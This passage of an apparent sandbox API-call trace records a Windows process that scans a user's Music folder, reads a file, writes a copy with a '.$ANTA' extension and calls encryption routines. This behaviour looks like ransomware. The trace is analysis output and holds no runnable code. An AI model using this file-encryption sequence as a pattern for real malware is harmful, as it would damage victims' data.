Flags=0x0, Size=0x60) returned 0x4359cd8 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0115.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.432] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy")) returned 0x10 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.432] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\g4kpqwyzsqa5pz.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.433] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0115.433] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0115.433] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0115.433] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0115.436] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0115.436] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x10000, lpOverlapped=0x0) returned 1 [0115.439] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x3ad5, lpOverlapped=0x0) returned 1 [0115.439] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0115.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0115.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13ad5) returned 0x4516010 [0115.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0115.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13ad5) returned 0x4529af0 [0115.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.442] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13ad5) returned 0x4516010 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.443] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0115.508] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0115.508] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0115.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0115.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13ad5) returned 0x4516010 [0115.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13ad5) returned 0x499a008 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0115.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0115.510] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0115.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0115.510] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0115.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0115.510] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0115.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0115.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0115.511] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0115.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.511] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0115.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.512] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 